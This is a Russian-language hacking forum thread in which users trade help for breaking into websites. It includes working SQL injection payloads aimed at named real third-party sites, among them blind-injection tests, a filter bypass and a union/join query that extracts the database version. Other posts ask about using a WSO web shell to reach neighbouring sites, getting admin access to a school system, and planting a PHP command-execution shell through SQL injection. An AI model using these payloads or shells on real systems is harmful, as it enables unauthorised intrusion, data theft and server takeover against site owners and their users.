Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    303
    Likes Received:
    35
    Reputations:
    0
    то есть вообще нету вариантов узнать htpasswd или залить скрипт?

    а можно както через пхпмайадмин найти все значения в базе и заменить на другие?
     
  2. Stronger

    Stronger Member

    Joined:
    26 Dec 2010
    Messages:
    55
    Likes Received:
    7
    Reputations:
    2
    существуют ли уязвимости у asp (а именно форма входа login.asp)?
     
  3. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,057
    Likes Received:
    615
    Reputations:
    690
    написать тебе бажный скрипт ?
     
    _________________________
  4. Stronger

    Stronger Member

    Joined:
    26 Dec 2010
    Messages:
    55
    Likes Received:
    7
    Reputations:
    2
    этот вопрос с сарказмом?)

    Вообщем,существует сайт с движком NetSchool (4.50 версия). Мне нужно зайти с админского аккаунта. есть какие нибудь уязвимости,и,если можно,написать поподробнее о них.
     
  5. BOSS

    BOSS Member

    Joined:
    15 Jun 2010
    Messages:
    86
    Likes Received:
    5
    Reputations:
    0
    При использовании WSO шелла, иногда можно опуститься на каталог ниже и увидеть соседние сайты на сервере. Иногда папка имеет название site.com, и тогда я могу просто скопировать название и перейти на сайт, но иногда название не совпадает с доменом. Как узнать точный домен?
     
  6. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    423
    Likes Received:
    165
    Reputations:
    126
    Как вариант посмотреть все домены на ip и сверить название папки с названием сайта.
     
    _________________________
  7. BOSS

    BOSS Member

    Joined:
    15 Jun 2010
    Messages:
    86
    Likes Received:
    5
    Reputations:
    0
    Как их посмотреть? Где?
     
  8. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,420
    Likes Received:
    814
    Reputations:
    851
    немного поможет разобраться:
    https://forum.antichat.net/thread397144.html
     
    _________________________
  9. MrKloud

    MrKloud New Member

    Joined:
    3 Jan 2012
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Помогите найти что нибудь для vbulletin 3.8.7 pl3. Про сплойт через EggAvatar - знаю, а кроме этого ничего не нашёл.
     
  10. warmup

    warmup New Member

    Joined:
    3 Apr 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Подскажите, кто знает. Есть онлайн проект на флеше. Нашел форму которая разрешает загрузку и вывод флеш контента пользователю. (как пример - личные сообщения пропускают и показывают всю флешку). С ActionScript знаком совсем мало. Можно сказать - вообще не знаком :D
    Дайте пару советов, если можно с примерами хотя-бы алерта (если это возможно вообще в AS). Можно в ЛС, у кого спортивный интерес) (в проекте более миллиона участников).
     
  11. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Быть может, у кого появятся какие идеи как реализовать.

    Валидное условие:
    http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+order+by+1--+
    Валидное условие:
    http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=1--+
    Невалидное условие:
    http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+or+1=0--+

    Неполучилось провести объединение через union, ни через blind конструкции.
    условие
    http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' or 5=find_in_set(substring((SELECT version()),1,1),'1,1,2,3,4,5')--+ не срабатывает, не срабатывает даже substring в чистом варианте виде +or+5=substring(version(),1,1)--+


    Если не трудно, то в личку если есть конкретные варианты. С меня бонус


    P.S. Походу где-то рубиться запятая не давая использовать функции соотв
     
    #22871 Cennarios, 25 Dec 2013
    Last edited: 25 Dec 2013
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    855
    Reputations:
    857
    http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+substring((@@version)+from+1+for+1)=4+--+ FALSE

    http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn'+and+1=1+and+substring((@@version)+from+1+for+1)=5+--+ TRUE
     
    _________________________
    4 people like this.
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,420
    Likes Received:
    814
    Reputations:
    851
    Покрутил в сторону join(), но адекватного вывода не нашел((
    пока что как вариант написать сплоит под блинд, завтра если будет возможность еще покручу, скуль интересная)
     
    _________________________
  14. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Вот собственно решение найденое мной:
    ?varparam=value'+or+1='s'+IN+('a')+OR+1='s'+IN+('b')+OR+1='s'+IN+('s')--+

    через OR объединяем чарсеты и строим условие )
     
  15. KolosJey

    KolosJey Member

    Joined:
    21 Dec 2009
    Messages:
    45
    Likes Received:
    42
    Reputations:
    48
    Вывод.

    http://videos.webpronews.com/video/playlist.php?movie_name=ses_jcolborn' and 1=2 union select * from (select "ses_jcolborn' and 1=2 union select * from (select version())d join (select 2)e join (select 3)f join (select 4)g join (select 5)h--+")a join (select 2)b join (select 3)c limit 1--+

    Если нужны запятые можно в хекс.

    :) что бы что то покрутить, нужно понимать хотя бы как оно работает
    что это за минус, чудо? )
     
    6 people like this.
  16. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    280
    Likes Received:
    119
    Reputations:
    27
    Сканировал сайт нашёл Blind SQL Injection

    Сайт http://binker.org.ua/reg.html

    Post запрос code=1&email=sample@email.tst&reg_referer=0&regname=-1' or 4 = '5

    Можно ли её раскрутить ?
     
  17. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    403
    Likes Received:
    40
    Reputations:
    23
    скорее всего стоит не Mysql, дальше не стал крутить
     
  18. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    280
    Likes Received:
    119
    Reputations:
    27
  19. Grifon

    Grifon Elder - Старейшина

    Joined:
    20 Mar 2008
    Messages:
    60
    Likes Received:
    2
    Reputations:
    0
    Товарищи добрый день. Мне нужно протестировать пару сканеров. Не подскажите уязвимые сервисы для Винд Сервер 2003?
     
  20. imprenko

    imprenko New Member

    Joined:
    9 Sep 2010
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Приветствую всех.
    есть скуль есть права могу читать и записывать файлы
    но файлы php txt и т.д не создаются только html
    можно создать:
    1.php.html но он будит пуст
    2.txt.html будит с кодом но с таким <?php system($_POST['ad']); ?><?php system($_POST['ad']); ?>
    3.html будит с кодом но с таким <?php system($_POST['ad']); ?><?php system($_POST['ad']); ?>
    почему то 2 раза записывается в файл
    выполнение команд видимо не работает из за этого
    позаливал кучу разных шеллов и все отображаются коряво php во всех не работают
    залил аплоадер тоже с помощью него не заливают файлы никакие
    подскажите как сделать правильно чтоб работали команды
     
Loading...
Thread Status:
Not open for further replies.